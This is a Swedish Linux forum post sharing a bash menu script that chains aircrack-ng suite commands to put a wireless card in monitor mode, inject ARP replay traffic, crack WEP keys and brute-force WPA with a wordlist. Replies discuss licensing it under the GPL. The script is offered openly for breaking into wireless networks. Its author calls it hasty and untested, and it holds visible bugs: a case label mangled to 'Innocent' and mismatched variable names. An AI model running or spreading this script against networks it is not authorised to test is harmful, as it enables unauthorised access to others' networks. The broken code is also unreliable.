Välkommen till linuxportalen.se!

Linuxportalen.se är Sveriges största och aktivaste webbplats för användare av öppen- och fri programvara.

Du besöker Linuxportalen.se som gäst vilket begränsar din möjlighet att använda webbplatsens alla funktioner. Genom att registera dig som medlem får du inte bara möjlighet att söka bland webbplatsens innehåll, skapa nya och delta i befintliga diskussioner, skapa din egen blogg, kommunicera med andra medlemmar genom privata meddelanden och delta i omröstningar. Du får också tillgång till Veckans Kadavro - en seriestrip unikt skapad för Linuxportalen.se!

Registeringen sker snabbt och är helt kostnadsfri - tveka inte, bli medlem idag!

Mitt "felaktiga" Wifi-hack script!

Läggs med fördel i /usr/local/bin

Skrev ihop det lite snabbt en dag när jag inte hade något speciellt för mig. Kommandot lspci -k visar att mitt trådlösa nätverkskort använder denna kärnmodul ath9k

Modulen skall vara patchad(injected) med det som behövs för att penetrera trådlösa accesspunkter, slipper alltså göra något sådant själv. När jag sätter igång kortet på monitormode så får jag flera interface än wlan0 som exempelvis mon0 osv. Kan se exakt vilka det är med ifconfig. wlan0 kan behöva bytas ut mot mon0 och vicecversa på vissa ställen i mitt script.

Kan ha slarvat lite när jag skrev ihop detta och om det ska gå att cracka bruteforca WPA-nätverk krävs troligtvis en annan dictionary än den jag använder i kodexemplet nedan /usr/share/dict/words

Vissa kommandon kan också behöva andra parametrar. Det mesta är som sagt ihopskrivet snabbt och jag har inte haft så många möjligher att testa scriptet.Slänger ut koden här för att det finns ett intresse hos vissa att se den, kan hända att jag skriver klart scriptet själv också någon gång i framtiden.

#!/bin/bash
#Wifi-Hack         
function Step1 {
clear
airmon-ng stop wlan0 && ifconfig wlan0 down && airmon-ng start wlan0 && airodump-ng mon0
}
function Step2 {
clear
echo -n Skriv "CHANNEL"
read CHANNEL
echo -n Skriv "SSID" att analysera
read SSID
airodump-ng -c $CHANNEL -w wifi --bssid $SSID wlan0
#Alternativ rad airodump-ng -c $CHANNEL -w wifi --bssid $SSID mon0
}
function Step3 {
clear
echo -n Skriv SSID att "PENETRERA"
read PENETRERA
echo -n Skriv wlan0 "Mac"
read Mac
aireplay-ng -1 0 -a $PENETRERA -h $MAC mon0 && aireplay-ng -3 -b $PENETRERA -h $MAC wlan0
#Alternativ rad aireplay-ng -1 0 -a $PENETRERA -h $MAC mon0 && aireplay-ng -3 -b $PENETRERA -h $MAC mon0
}
function Step4 {
clear
echo -n Skriv SSID att "CRACKA"
read CRACKA
aircrack-ng -b $CRACKA wifi-01.cap
}
function Step5 {
clear
kismet
}
function Step6 {
clear
echo -n Skriv wlan0 "Mac"
read Mac
aircrack-ng -a 2 -b $MAC -w /usr/share/dict/words
#Ordlistan /usr/share/dict/words
}
function menu {
clear
echo -e "\t\t\tWifi-Hack Meny\n"
echo -e "\ta. Step 1 Analysera tillgängliga nätverk, switcha wlan till monitormode"
echo -e "\tb. Step 2 Riktad Analys, Trafik mot specifikt nätverk"
echo -e "\tc. Step 3 Hämta data över WEP"
echo -e "\td. Step 4 Cracka WEP"
echo -e "\te. Step 5 Analysera tillgängliga nätverk även dolda"
echo -e "\tf. Step 6 Cracka WPA"
echo -e "\t0. Avsluta Program\n\n"
read -n 1 option
}
while [ 1 ]
do
menu
case $option in
a)
Step1 ;;
b)
Step2 ;;
c)
Step3 ;;
d)
Step4 ;;
e)
Step5 ;;
f)
Step6 ;;
Innocent
break ;;
*)
clear
echo "Fel Val" ;;
esac
echo -en "\n\n\t\t\tTryck på valfri tangent för att fortsätta"
read -n 1 line
done
clear
 

Alternativ för kommentarvisning

Välj ditt önskade sätt att visa kommentarerna och klicka på "Spara" för att verkställa dina ändringar.

Lyfangs bild

 Tack för att du distribuerade källkoden! Öppen källkod... Har källkoden upphovsrätt eller får användas och nyttjas för fri användning? Kanske någon på LP kan förbättra källkoden?

Symbolen:

Innocent = 0 ) utan mellanslag

tomasuus bild

Bra att du var vaken och uppmärksammade 0 ) Smile

Det är bara att använda koden fritt som ni vill, om jag inte velat dela med mig av koden så hade jag hållt på den.Kopiera koden, sprid, förbättra, GNU-licens!

Lyfangs bild

 Detta arbete är fri programvara; du får vidaredistribuera det och/eller förändra det i enlighet med villkoren i GNU General Public License utgiven av Free Software Foundation; antingen version 2 av licensen, eller (om så önskas) valfri senare version. Detta arbete distribueras med förhoppning att det ska vara användbart, men utan NÅGON SOM HELST GARANTI; även utan garantier om SÄLJBARHET eller ANVÄNDBARHET FÖR NÅGOT SPECIELLT ÄNDAMÅL. Ni bör ha fått en kopia av GNU General Public License tillsammans med denna kod; om inte, skriv till Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA

Se GNU General Public License för fler detaljer.

En GPL mall sammansatt av Lyfang 2011.

Detta arbete är fri programvara; du får vidaredistribuera det och/eller förändra det i enlighet med villkoren i GNU General Public License utgiven av Free Software Foundation; antingen version 2 av licensen, eller (om så önskas) valfri senare version. Detta arbete distribueras med förhoppning att det ska vara användbart, men utan NÅGON SOM HELST GARANTI; även utan garantier om SÄLJBARHET eller ANVÄNDBARHET FÖR NÅGOT SPECIELLT ÄNDAMÅL.

Se GNU General Public License för fler detaljer.

Källa: Mall:GPL

Ni bör ha fått en kopia av GNU General Public License tillsammans med denna kod; om inte, skriv till Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA

Källa: Template:GPL>Google Översätt>Korrektur av Lyfang (2011)